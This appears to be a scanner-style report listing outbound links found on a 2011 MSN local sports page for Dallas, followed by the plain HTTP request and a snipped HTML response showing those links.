http://msn.foxsports.com/cbk/story/Oklahoma-83-Texas-Tech-74-06947696
http://msn.foxsports.com/cbk/story/Oneanddone-6plus-players-who-might-leave-quick-78004338
http://msn.foxsports.com/cbk/story/SMU-59-Tulsa-58-81254706
http://msn.foxsports.com/cbk/story/SMU-79-Southern-Miss-65-96624346
http://msn.foxsports.com/cbk/story/Sadler-must-look-beyond-borders-for-future-Huskers-50872138
http://msn.foxsports.com/cbk/story/TCU-78-Wyoming-60-47712021
http://msn.foxsports.com/cbk/story/Texas-Longhorns-defeat-Oklahoma-State-on-10-year-crash-anniversary-012611
http://msn.foxsports.com/cbk/story/Texas-Tech-72-Nebraska-71-91656634
http://msn.foxsports.com/cbk/story/Texas-Tech-92-Iowa-St-83-37630109
http://msn.foxsports.com/cbk/story/TexasArlington-62-Stephen-FAustin-52-85322240
http://msn.foxsports.com/cbk/story/TexasArlington-65-Sam-Houston-St-58-12896482
http://msn.foxsports.com/cbk/story/TexasArlington-70-Texas-AampMCorpus-Christi-49-49303869
http://msn.foxsports.com/cbk/story/UAB-67-SMU-53-71299212
http://msn.foxsports.com/cbk/story/Utah-75-TCU-62-52354638
http://msn.foxsports.com/cbk/team?categoryId=71650
http://msn.foxsports.com/cbk/team?categoryId=71780
http://msn.foxsports.com/cbk/team?categoryId=71871
http://msn.foxsports.com/cbk/team?categoryId=71872
http://msn.foxsports.com/cbk/team?categoryId=71874
http://msn.foxsports.com/cbk/team?categoryId=71922
http://msn.foxsports.com/cbk/team?categoryId=71926
http://msn.foxsports.com/cbk/teamSchedule?categoryId=71650
http://msn.foxsports.com/cbk/teamSchedule?categoryId=71780
http://msn.foxsports.com/cbk/teamSchedule?categoryId=71871
http://msn.foxsports.com/cbk/teamSchedule?categoryId=71872
http://msn.foxsports.com/cbk/teamSchedule?categoryId=71874
http://msn.foxsports.com/cbk/teamSchedule?categoryId=71922
http://msn.foxsports.com/cbk/teamSchedule?categoryId=71926
http://msn.foxsports.com/cbk/teamStats?categoryId=71650
http://msn.foxsports.com/cbk/teamStats?categoryId=71780
http://msn.foxsports.com/cbk/teamStats?categoryId=71871
http://msn.foxsports.com/cbk/teamStats?categoryId=71872
http://msn.foxsports.com/cbk/teamStats?categoryId=71874
http://msn.foxsports.com/cbk/teamStats?categoryId=71922
http://msn.foxsports.com/cbk/teamStats?categoryId=71926
http://msn.foxsports.com/cfb
http://msn.foxsports.com/cfb/standings
http://msn.foxsports.com/cfb/story/AP-AllAmerica-Team-List-25730143
http://msn.foxsports.com/cfb/story/Army-holds-on-to-beat-SMU-in-the-Armed-Forces-Bowl-123010
http://msn.foxsports.com/cfb/story/ArmySMU-Preview-75693926
http://msn.foxsports.com/cfb/story/Bears-make-first-bowl-appearance-since-1994-47130273
http://msn.foxsports.com/cfb/story/Canadian-jumps-from-fire-to-pro-football-88154560
http://msn.foxsports.com/cfb/story/Illinois-beats-Baylor-for-rare-bowl-win-122910
http://msn.foxsports.com/cfb/story/Kansas-St-49-North-Texas-41-86875018
http://msn.foxsports.com/cfb/story/Leshoure-leads-Illinois-past-Baylor-in-Texas-Bowl-67062026
http://msn.foxsports.com/cfb/story/Mike-Leach-lawsuit-thrown-out-against-Texas-Tech-012111
http://msn.foxsports.com/cfb/story/Mike-Leach-thought-he-was-perfect-fit-for-Maryland-010411
http://msn.foxsports.com/cfb/story/NCAA-Texas-Tech-broke-recruiting-rules-in-three-sports-010711
http://msn.foxsports.com/cfb/story/Nebraska-Oklahoma-State-lead-AP-All-Big-12-team-120210
http://msn.foxsports.com/cfb/story/No-13-Virginia-Tech-37-Virginia-7-30594865
http://msn.foxsports.com/cfb/story/Reserves-key-to-titles-bowls-for-some-ACC-teams-22352730
http://msn.foxsports.com/cfb/story/Rose-Bowl-is-more-than-Badgers-size-Frogs-speed-90645669
http://msn.foxsports.com/cfb/story/TCU-holds-off-Wisconsin-to-win-Rose-Bowl-
http://msn.foxsports.com/cfb/story/Texas-DE-Acho-wins-scholarathlete-award-52030010
http://msn.foxsports.com/cfb/story/Texas-Longhorns-lose-three-assistant-coaches-120610
http://msn.foxsports.com/cfb/story/Texas-Tech-45-Northwestern-38-91337506
http://msn.foxsports.com/cfb/story/Tuneup-for-Hokies-is-Cavaliers-bowl-game-90790195
http://msn.foxsports.com/cfb/story/UCF-SMU-meet-for-Conference-USA-championship-36668645
http://msn.foxsports.com/cfb/story/UCF-edges-SMU-in-Conference-USA-Championship-Game-120410
http://msn.foxsports.com/cfb/story/Unbeaten-TCU-stops-Wisconsin-2119-in-Rose-Bowl-96857989
http://msn.foxsports.com/cfb/story/WisconsinTCU-Preview-82908187
http://msn.foxsports.com/cfb/team?categoryId=86068
http://msn.foxsports.com/cfb/team?categoryId=86111
http://msn.foxsports.com/cfb/team?categoryId=86112
http://msn.foxsports.com/cfb/team?categoryId=86127
http://msn.foxsports.com/cfb/team?categoryId=86128
http://msn.foxsports.com/cfb/team?categoryId=86138
http://msn.foxsports.com/cfb/teamSchedule?categoryId=86068
http://msn.foxsports.com/cfb/teamSchedule?categoryId=86111
http://msn.foxsports.com/cfb/teamSchedule?categoryId=86112
http://msn.foxsports.com/cfb/teamSchedule?categoryId=86127
http://msn.foxsports.com/cfb/teamSchedule?categoryId=86128
http://msn.foxsports.com/cfb/teamSchedule?categoryId=86138
http://msn.foxsports.com/cfb/teamStats?categoryId=86068
http://msn.foxsports.com/cfb/teamStats?categoryId=86111
http://msn.foxsports.com/cfb/teamStats?categoryId=86112
http://msn.foxsports.com/cfb/teamStats?categoryId=86127
http://msn.foxsports.com/cfb/teamStats?categoryId=86128
http://msn.foxsports.com/cfb/teamStats?categoryId=86138
http://msn.foxsports.com/fantasy
http://msn.foxsports.com/fe/fsi/img/futbol/teamLogo/statsInc/Large/5357.gif
http://msn.foxsports.com/fe/fsi/img/futbol/teamLogo/statsInc/Large/5726.gif
http://msn.foxsports.com/fe/img/CBK/TeamLogo/Large/415.gif
http://msn.foxsports.com/fe/img/CBK/TeamLogo/Large/50.gif
http://msn.foxsports.com/fe/img/CBK/TeamLogo/Large/515.gif
http://msn.foxsports.com/fe/img/CBK/TeamLogo/Large/576.gif
http://msn.foxsports.com/fe/img/CBK/TeamLogo/Large/585.gif
http://msn.foxsports.com/fe/img/CBK/TeamLogo/Large/588.gif
http://msn.foxsports.com/fe/img/CBK/TeamLogo/Large/592.gif
http://msn.foxsports.com/fe/img/CFB/TeamLogo/Large/182.png
http://msn.foxsports.com/fe/img/CFB/TeamLogo/Large/79.png
http://msn.foxsports.com/fe/img/CFB/TeamLogo/Large/82.png
http://msn.foxsports.com/fe/img/CFB/TeamLogo/Large/83.png
http://msn.foxsports.com/fe/img/CFB/TeamLogo/Large/85.png
http://msn.foxsports.com/fe/img/CFB/TeamLogo/Large/86.png
http://msn.foxsports.com/fe/img/MLB/TeamLogo/Large/13.gif
http://msn.foxsports.com/fe/img/MLB/TeamLogo/Large/18.gif
http://msn.foxsports.com/fe/img/NBA/TeamLogo/Large/10.png
http://msn.foxsports.com/fe/img/NBA/TeamLogo/Large/24.png
http://msn.foxsports.com/fe/img/NBA/TeamLogo/Large/6.png
http://msn.foxsports.com/fe/img/NFL/TeamLogo/Large/34.png
http://msn.foxsports.com/fe/img/NFL/TeamLogo/Large/6.png
http://msn.foxsports.com/fe/img/NHL/TeamLogo/Large/9.png
http://msn.foxsports.com/fe/img/WCBK/TeamLogo/Large/50.gif
http://msn.foxsports.com/fe/img/WCBK/TeamLogo/Large/515.gif
http://msn.foxsports.com/fe/img/WCBK/TeamLogo/Large/576.gif
http://msn.foxsports.com/fe/img/WCBK/TeamLogo/Large/585.gif
http://msn.foxsports.com/fe/img/WCBK/TeamLogo/Large/592.gif
http://msn.foxsports.com/fe/img/WNBA/TeamLogo/Large/8.gif
http://msn.foxsports.com/foxsoccer
http://msn.foxsports.com/foxsoccer/mls
http://msn.foxsports.com/foxsoccer/mls/standings
http://msn.foxsports.com/foxsoccer/mls/team/FC-Dallas?categoryId=377
http://msn.foxsports.com/foxsoccer/mls/team/Houston-Dynamo?categoryId=382
http://msn.foxsports.com/golf
http://msn.foxsports.com/mlb
http://msn.foxsports.com/mlb/standings
http://msn.foxsports.com/mlb/story/Astros-infielder-Keppinger-to-have-foot-surgery-48484608
http://msn.foxsports.com/mlb/story/Astros-pitcher-Carrillo-arrested-at-Fla-casino-03199288
http://msn.foxsports.com/mlb/story/Houston-Astros-reach-34M-3-year-deal-with-RHP-Wandy-Rodriguez-012511
http://msn.foxsports.com/mlb/story/Orioles-hope-to-add-Guerrero-to-revamped-roster-83871116
http://msn.foxsports.com/mlb/story/Padres-promote-Chris-Gwynn,-hire-Dave-Roberts
http://msn.foxsports.com/mlb/story/Rangers-Napoli-avoid-arbitration-with-58M-deal-14623420
http://msn.foxsports.com/mlb/story/Rangers-trade-Francisco-to-Blue-Jays-for-Napoli-03177108
http://msn.foxsports.com/mlb/story/Salary-Arbitration-Eligibles-List
http://msn.foxsports.com/mlb/team/houston-astros
http://msn.foxsports.com/mlb/team/houston-astros/schedule
http://msn.foxsports.com/mlb/team/houston-astros/stats
http://msn.foxsports.com/mlb/team/texas-rangers
http://msn.foxsports.com/mlb/team/texas-rangers/schedule
http://msn.foxsports.com/mlb/team/texas-rangers/stats
http://msn.foxsports.com/nascar
http://msn.foxsports.com/nba
http://msn.foxsports.com/nba/standings
http://msn.foxsports.com/nba/story/Dallas-Mavericks-beat-Houston-Rockets-NBA-012711
http://msn.foxsports.com/nba/story/HawksMavericks-Preview-77679106
http://msn.foxsports.com/nba/story/Mavericks-112-Clippers-105-88822399
http://msn.foxsports.com/nba/story/Rockets-96-Clippers-83-53563135
http://msn.foxsports.com/nba/story/RocketsMavericks-Preview-22944154
http://msn.foxsports.com/nba/story/RocketsSpurs-Preview-80260514
http://msn.foxsports.com/nba/story/Spurs-hand-Jazz-6th-straight-loss-012611
http://msn.foxsports.com/nba/story/SpursJazz-Preview-36856822
http://msn.foxsports.com/nba/story/Weighing-Ws-and-Ls-vs-numbers-in-AllStar-votes-33069128
http://msn.foxsports.com/nba/team/dallas-mavericks
http://msn.foxsports.com/nba/team/dallas-mavericks/schedule
http://msn.foxsports.com/nba/team/dallas-mavericks/stats
http://msn.foxsports.com/nba/team/houston-rockets
http://msn.foxsports.com/nba/team/houston-rockets/schedule
http://msn.foxsports.com/nba/team/houston-rockets/stats
http://msn.foxsports.com/nba/team/san-antonio-spurs
http://msn.foxsports.com/nba/team/san-antonio-spurs/schedule
http://msn.foxsports.com/nba/team/san-antonio-spurs/stats
http://msn.foxsports.com/nfl
http://msn.foxsports.com/nfl/standings
http://msn.foxsports.com/nfl/story/AP-source-Texans-hire-Herring-to-coach-LBs-30897071
http://msn.foxsports.com/nfl/story/Brees-Zimmer-win-PFWA-Awards-52258753
http://msn.foxsports.com/nfl/story/Eagles-WR-Jackson-replaced-by-Austin-in-Pro-Bowl-52325786
http://msn.foxsports.com/nfl/story/Goodell-skips-Pro-Bowl-to-focus-on-new-contract-60632089
http://msn.foxsports.com/nfl/story/Howdy-A-Big-D-welcome-to-Packers-Steelers-35730692
http://msn.foxsports.com/nfl/story/Jason-Garrett-Dallas-Cowboys-head-coach-010611
http://msn.foxsports.com/nfl/story/NFL-NFC-AFC-Pro-Bowl-first-timers-soaking-it-all-in-012811
http://msn.foxsports.com/nfl/story/Players-hoping-Pro-Bowl-stays-in-Hawaii-35210862
http://msn.foxsports.com/nfl/team/dallas-cowboys
http://msn.foxsports.com/nfl/team/dallas-cowboys/schedule
http://msn.foxsports.com/nfl/team/dallas-cowboys/stats
http://msn.foxsports.com/nfl/team/houston-texans
http://msn.foxsports.com/nfl/team/houston-texans/schedule
http://msn.foxsports.com/nfl/team/houston-texans/stats
http://msn.foxsports.com/nhl
http://msn.foxsports.com/nhl/standings
http://msn.foxsports.com/nhl/story/Dallas-Stars-Jamie-Benn-Tom-Wandell-out-with-upper-body-injuries-012611
http://msn.foxsports.com/nhl/story/OilersStars-Preview-96456130
http://msn.foxsports.com/nhl/story/Stars-3-Oilers-1-38835353
http://msn.foxsports.com/nhl/story/Vancouver-Canucks-beat-Dallas-Stars-NHL-012411
http://msn.foxsports.com/nhl/team/dallas-stars
http://msn.foxsports.com/nhl/team/dallas-stars/schedule/
http://msn.foxsports.com/nhl/team/dallas-stars/stats/
http://msn.foxsports.com/tennis
http://msn.foxsports.com/video
http://msn.foxsports.com/wcbk
http://msn.foxsports.com/wcbk/schedule
http://msn.foxsports.com/wcbk/standings
http://msn.foxsports.com/wcbk/statsTeam
http://msn.foxsports.com/wcbk/story/Baylor-Lady-Bears-Roster-34247840
http://msn.foxsports.com/wcbk/story/Baylors-future-bright-for-Griner-young-Bears-60468229
http://msn.foxsports.com/wcbk/story/CONNECTICUT-370-61746829
http://msn.foxsports.com/wcbk/story/Fewest-Points-in-One-Half-NCAA-Tournament-07292331
http://msn.foxsports.com/wcbk/story/NCAA-Championship-Scores-81750110
http://msn.foxsports.com/wcbk/story/NCAA-Womens-Final-Four-MVPs-25159731
http://msn.foxsports.com/wcbk/story/National-Team-Leaders
http://msn.foxsports.com/wcbk/story/National-Team-Leaders3
http://msn.foxsports.com/wcbk/story/Nebraskas-Yori-chosen-AP-coach-of-the-year-90044251
http://msn.foxsports.com/wcbk/story/No-20-TCU-78-Colorado-St-51-34049731
http://msn.foxsports.com/wcbk/story/No-22-TCU-80-San-Diego-St-63-56753002
http://msn.foxsports.com/wcbk/story/No-23-TCU-81-UNLV-61-58963977
http://msn.foxsports.com/wcbk/story/OKLAHOMA-2710-68082171
http://msn.foxsports.com/wcbk/story/Womens-NCAA-AllTournament-Teams-37687435
http://msn.foxsports.com/wcbk/story/Womens-NCAA-Championship-Winningest-Coaches-87055644
http://msn.foxsports.com/wcbk/story/Wyoming-73-No-22-TCU-67-02071027
http://msn.foxsports.com/wnba
http://msn.foxsports.com/wnba/schedule
http://msn.foxsports.com/wnba/standings
http://msn.foxsports.com/wnba/stats
http://msn.foxsports.com/wnba/story/Leuchanka-leads-Belarus-to-7053-upset-of-Russia-67166762
http://msn.foxsports.com/wnba/story/Mercury-92-Silver-Stars-73-19788864
http://msn.foxsports.com/wnba/story/Silver-Stars-92,-Mercury-91
http://msn.foxsports.com/wnba/story/USA-aims-to-reclaim-gold-at-womens-hoops-worlds-21153241
http://msn.match.com/msn/index.aspx
http://msn.whitepages.com/
http://realestate.msn.realtor.com/realestateandhomes-search/75207?gate=msn&source=a2mszh1t042
http://video.msnbc.com/
http://www.bing.com/events/search?q=2011 Dallas Super Bowl Weekend - Fantasy Party - Hosted by P. Diddy with Clinton Sparks&p1=[Events+source="vertical"+qzeventid="z162394705"]&form=MSNLAP
http://www.bing.com/events/search?q=2011 Super Bowl XLV Weekend Party - Hosted by the Black Eyed Peas and David Guetta&p1=[Events+source="vertical"+qzeventid="z162393185"]&form=MSNLAP
http://www.bing.com/events/search?q=Everything's Bigger in Texas Party DUEX Super Celebrity Party&p1=[Events+source="vertical"+qzeventid="z155484965"]&form=MSNLAP
http://www.bing.com/events/search?q=NFL Experience&p1=[Events+source="vertical"+qzeventid="f538503"]&form=MSNLAP
http://www.bing.com/events/search?q=NFLX After Dark at The NFL Experience&p1=[Events+source="vertical"+qzeventid="z157228725"]&form=MSNLAP
http://www.bing.com/local/Default.aspx?where=Dallas+TX&cat=1090&FORM=MSNLEC
http://www.bing.com/local/Default.aspx?where=Dallas+TX&cat=1372&FORM=MSNLEC
http://www.bing.com/local/Default.aspx?where=Dallas+TX&cat=306&FORM=MSNLEC
http://www.bing.com/local/Default.aspx?where=Dallas+TX&cat=533&FORM=MSNLEC
http://www.bing.com/local/Default.aspx?where=Dallas-TX&FORM=MSNLEC
http://www.bing.com/local/default.aspx?q=government+%26+community+near+75207&order=distance&FORM=MSNLEC
http://www.bing.com/local/default.aspx?q=shopping+near+75207&order=distance&FORM=MSNLEC
http://www.bing.com/local/default.aspx?q=sports+%26+recreation+near+75207&order=distance&FORM=MSNLEC
http://www.bing.com/local/ypdefault.aspx?cobrand=1&where=75207
http://www.bing.com/maps/?q=Dallas+TX&FORM=MSNLEC
http://www.bing.com/maps/default.aspx?wip=2&v=2&rtp=~&FORM=MSNNAV
http://www.bing.com/search?q=January+29&mkt=en-us&FORM=MSNLEC
http://www.bing.com/shopping?FORM=MSNLEC
http://www.bing.com/travel/?cid=msn_navigation&FORM=MSNNAV
http://www.bing.com/travel/deals/airline-ticket-deals.do?cid=msnlocal
http://www.bing.com/weather/tripplan?q=Dallas+Texas+Weather&unit=F&qpvt=weather+Dallas&form=MSNLEC
http://www.delish.com/
http://www.myhomeredacted/
https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296344861&rver=5.5.4177.0&wp=LBI&wreply=http:%2F%2Flocal.redacted%2Fsports.aspx%3Fzip%3D75207%26q%3D75207&lc=1033&id=74430
https://secure.opinionlab.com/ccc01/o.asp?ID=MhTrwKXH&resize=false
https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB

Request

GET /sports.aspx?zip=75207&q=75207 HTTP/1.1
Host: local.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 23:47:42 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA32
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=3f0b19bf446b4984bc19db690bf53f0f; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=8BDA16619B44460EA4BD45956D672736; domain=.redacted; expires=Wed, 17-Aug-2011 23:47:41 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 94955

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml"><head><meta http-e
...[SNIP]...
<li><a href="http://video.msnbc.com">Video</a>
...[SNIP]...
<li class="coc3"><a href="http://msn.foxsports.com/">Sports</a><ul><li class="first"><a href="http://msn.foxsports.com/golf">Golf</a></li><li><a href="http://msn.foxsports.com/mlb">MLB</a></li><li><a href="http://msn.foxsports.com/nascar">NASCAR</a></li><li><a href="http://msn.foxsports.com/nba">NBA</a></li><li><a href="http://msn.foxsports.com/cfb">NCAA Football</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nfl">NFL</a></li><li><a href="http://msn.foxsports.com/fantasy">Play Fantasy</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/foxsoccer">Soccer</a></li><li><a href="http://msn.foxsports.com/tennis">Tennis</a></li><li class="last"><a href="http://msn.foxsports.com/video ">Video Highlights</a>
...[SNIP]...
<li><a href="http://www.delish.com/">Cooking</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_navigation&FORM=MSNNAV">Travel</a>
...[SNIP]...
<li><a href="http://www.bing.com/maps/default.aspx?wip=2&v=2&rtp=~&FORM=MSNNAV">Maps & Directions</a>
...[SNIP]...
<li><a href="http://www.delish.com/">Delish</a></li><li><a href="http://msn.match.com/msn/index.aspx">Personals</a></li><li><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li><a href="http://www.bing.com/shopping?FORM=MSNLEC">Shopping</a></li><li><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB">Feedback</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_navigation&FORM=MSNNAV">Travel</a>
...[SNIP]...
<li class="first"><a class="to_inbox" href="http://mail.live.com/">Hotmail</a></li><li class="last"><a class="to_msgr" href="http://download.live.com/?sku=messenger">Messenger</a>
...[SNIP]...
<div><a href="https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296344861&rver=5.5.4177.0&wp=LBI&wreply=http:%2F%2Flocal.redacted%2Fsports.aspx%3Fzip%3D75207%26q%3D75207&lc=1033&id=74430" class="dMSNME_1">Sign in</a>
...[SNIP]...
<div class="link"><a href="http://www.bing.com/search?q=January+29&mkt=en-us&FORM=MSNLEC">Saturday, Jan. 29, 2011</a>
...[SNIP]...
<div class="link"><a href="http://www.myhomeredacted/" id="mkhm">Make MSN your home page</a>
...[SNIP]...
<div class="bingmap1" xmlns:cp="urn:schemas-microsoft-com/contentpublishing/content" xmlns:msxsl="urn:schemas-microsoft-com:xslt"><a class="attr" href="http://www.bing.com/maps/?q=Dallas+TX&FORM=MSNLEC"><img src="http://ecn.api.tiles.virtualearth.net/api/GetMap.ashx?c=32.78517781,-96.81912677&w=124&h=124&o=jpeg&b=r,shading.hill,mkt.en-US&z=8&token=AWrgcQkAAAByZSh_0bq4X0iGtxe4abWq" title="Dallas" alt="Dallas" height="124" width="124" /></a>
...[SNIP]...
<li class="first"><a href="http://www.bing.com/local/Default.aspx?where=Dallas+TX&cat=306&FORM=MSNLEC">Beauty salons</a>
...[SNIP]...
<li><a href="http://www.bing.com/local/Default.aspx?where=Dallas+TX&cat=533&FORM=MSNLEC">Child care services</a>
...[SNIP]...
<li><a href="http://www.bing.com/local/Default.aspx?where=Dallas+TX&cat=1090&FORM=MSNLEC">Florists</a></li><li><a href="http://www.bing.com/local/default.aspx?q=government+%26+community+near+75207&order=distance&FORM=MSNLEC">Government & community</a>
...[SNIP]...
<li><a href="http://www.bing.com/local/Default.aspx?where=Dallas+TX&cat=1372&FORM=MSNLEC">Hotels & motels</a>
...[SNIP]...
<li><a href="http://www.bing.com/local/default.aspx?q=shopping+near+75207&order=distance&FORM=MSNLEC">Shopping</a></li><li><a href="http://www.bing.com/local/default.aspx?q=sports+%26+recreation+near+75207&order=distance&FORM=MSNLEC">Sports & recreation</a>
...[SNIP]...
<li class="last"><a href="http://www.bing.com/local/Default.aspx?where=Dallas-TX&FORM=MSNLEC"><span class="custom">
...[SNIP]...
<li class="first"><a href="http://www.bing.com/weather/tripplan?q=Dallas+Texas+Weather&unit=F&qpvt=weather+Dallas&form=MSNLEC">Trip planner</a>
...[SNIP]...
<li><a href="http://msn.careerbuilder.com/jobseeker/jobs/jobResults.aspx?SiteID=cbmsnLO003&lr=CBMSN&sc_extcmp=JS_MSN_QSBox&s_rawwords=&s_freeloc=75207">Jobs</a></li><li><a href="http://www.bing.com/travel/deals/airline-ticket-deals.do?cid=msnlocal">Travel deals</a>
...[SNIP]...
<li><a href="http://realestate.msn.realtor.com/realestateandhomes-search/75207?gate=msn&source=a2mszh1t042">Real estate listings</a>
...[SNIP]...
<li><a href="http://msn.whitepages.com/">White pages</a>
...[SNIP]...
<li class="last"><a href="http://www.bing.com/local/ypdefault.aspx?cobrand=1&where=75207">Yellow pages</a>
...[SNIP]...
<td headers="gsport"><a href="http://msn.foxsports.com/wcbk">College BB Women</a>
...[SNIP]...
<td headers="gsport"><a href="http://msn.foxsports.com/nba">NBA</a>
...[SNIP]...
<td headers="gsport"><a href="http://msn.foxsports.com/nba">NBA</a>
...[SNIP]...
<td headers="gsport"><a href="http://msn.foxsports.com/wcbk">College BB Women</a>
...[SNIP]...
<td headers="gsport"><a href="http://msn.foxsports.com/wcbk">College BB Women</a>
...[SNIP]...
<td headers="gsport"><a href="http://msn.foxsports.com/wcbk">College BB Women</a>
...[SNIP]...
<td headers="gsport"><a href="http://msn.foxsports.com/nba">NBA</a>
...[SNIP]...
<td headers="gsport"><a href="http://msn.foxsports.com/nhl">NHL</a>
...[SNIP]...
<td headers="gsport"><a href="http://msn.foxsports.com/nba">NBA</a>
...[SNIP]...
<td headers="gsport"><a href="http://msn.foxsports.com/nba">NBA</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nfl/team/dallas-cowboys" title="Dallas Cowboys"><img src="http://msn.foxsports.com/fe/img/NFL/TeamLogo/Large/6.png" alt="Dallas Cowboys logo" width="80" height="80" /></a><div><span><a href="http://msn.foxsports.com/nfl/team/dallas-cowboys">Dallas Cowboys</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/nfl/story/Eagles-WR-Jackson-replaced-by-Austin-in-Pro-Bowl-52325786">Eagles WR Jackson replaced by Austin in Pro Bowl</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nfl/story/Goodell-skips-Pro-Bowl-to-focus-on-new-contract-60632089">Goodell skips Pro Bowl to focus on new contract</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nfl/story/Howdy-A-Big-D-welcome-to-Packers-Steelers-35730692">Howdy! A Big D welcome to Packers, Steelers</a>
...[SNIP]...
<li class="last"><a href="http://msn.foxsports.com/nfl/story/Jason-Garrett-Dallas-Cowboys-head-coach-010611">Cowboys remove Garrett's interim tag</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/nfl/standings">Standings</a></li><li><a href="http://msn.foxsports.com/nfl/team/dallas-cowboys/stats">Stats</a></li><li><a href="http://msn.foxsports.com/nfl/team/dallas-cowboys/schedule">Schedule</a></li><li class="last"><a href="http://msn.foxsports.com/nfl">NFL</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nfl/team/houston-texans" title="Houston Texans"><img src="http://msn.foxsports.com/fe/img/NFL/TeamLogo/Large/34.png" alt="Houston Texans logo" width="80" height="80" /></a><div><span><a href="http://msn.foxsports.com/nfl/team/houston-texans">Houston Texans</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/nfl/story/Players-hoping-Pro-Bowl-stays-in-Hawaii-35210862">Players hoping Pro Bowl stays in Hawaii</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nfl/story/NFL-NFC-AFC-Pro-Bowl-first-timers-soaking-it-all-in-012811">First-time Pro Bowlers soaking it all in</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nfl/story/Brees-Zimmer-win-PFWA-Awards-52258753">AP's NFL Awards on NFL Network during SB week</a>
...[SNIP]...
<li class="last"><a href="http://msn.foxsports.com/nfl/story/AP-source-Texans-hire-Herring-to-coach-LBs-30897071">AP source: Texans hire Herring to coach LBs</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/nfl/standings">Standings</a></li><li><a href="http://msn.foxsports.com/nfl/team/houston-texans/stats">Stats</a></li><li><a href="http://msn.foxsports.com/nfl/team/houston-texans/schedule">Schedule</a></li><li class="last"><a href="http://msn.foxsports.com/nfl">NFL</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cfb/team?categoryId=86111" title="TCU Horned Frogs"><img src="http://msn.foxsports.com/fe/img/CFB/TeamLogo/Large/85.png" alt="TCU Horned Frogs logo" width="80" height="80" /></a><div><span><a href="http://msn.foxsports.com/cfb/team?categoryId=86111">TCU Horned Frogs</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/cfb/story/Unbeaten-TCU-stops-Wisconsin-2119-in-Rose-Bowl-96857989">Unbeaten TCU stops Wisconsin 21-19 in Rose Bowl</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cfb/story/TCU-holds-off-Wisconsin-to-win-Rose-Bowl-">TCU wins one for the little guys </a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cfb/story/WisconsinTCU-Preview-82908187">Wisconsin-TCU Preview</a>
...[SNIP]...
<li class="last"><a href="http://msn.foxsports.com/cfb/story/Rose-Bowl-is-more-than-Badgers-size-Frogs-speed-90645669">Rose Bowl is more than Badgers' size, Frogs' speed</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/cfb/standings">Standings</a></li><li><a href="http://msn.foxsports.com/cfb/teamStats?categoryId=86111">Stats</a></li><li><a href="http://msn.foxsports.com/cfb/teamSchedule?categoryId=86111">Schedule</a></li><li class="last"><a href="http://msn.foxsports.com/cfb">College FB</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cfb/team?categoryId=86138" title="Texas Longhorns"><img src="http://msn.foxsports.com/fe/img/CFB/TeamLogo/Large/83.png" alt="Texas Longhorns logo" width="80" height="80" /></a><div><span><a href="http://msn.foxsports.com/cfb/team?categoryId=86138">Texas Longhorns</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/cfb/story/AP-AllAmerica-Team-List-25730143">AP All-America Team, List</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cfb/story/Texas-DE-Acho-wins-scholarathlete-award-52030010">Texas DE Acho wins scholar-athlete award</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cfb/story/Texas-Longhorns-lose-three-assistant-coaches-120610">Texas assistants leave after 5-7 season</a>
...[SNIP]...
<li class="last"><a href="http://msn.foxsports.com/cfb/story/Nebraska-Oklahoma-State-lead-AP-All-Big-12-team-120210">Cowboys, Huskers lead AP All-Big 12</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/cfb/standings">Standings</a></li><li><a href="http://msn.foxsports.com/cfb/teamStats?categoryId=86138">Stats</a></li><li><a href="http://msn.foxsports.com/cfb/teamSchedule?categoryId=86138">Schedule</a></li><li class="last"><a href="http://msn.foxsports.com/cfb">College FB</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cfb/team?categoryId=86128" title="Texas Tech Red Raiders"><img src="http://msn.foxsports.com/fe/img/CFB/TeamLogo/Large/86.png" alt="Texas Tech Red Raiders logo" width="80" height="80" /></a><div><span><a href="http://msn.foxsports.com/cfb/team?categoryId=86128">Texas Tech Red Raiders</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/cfb/story/Mike-Leach-lawsuit-thrown-out-against-Texas-Tech-012111">Appeals court rules against Leach</a>
...[SNIP]...
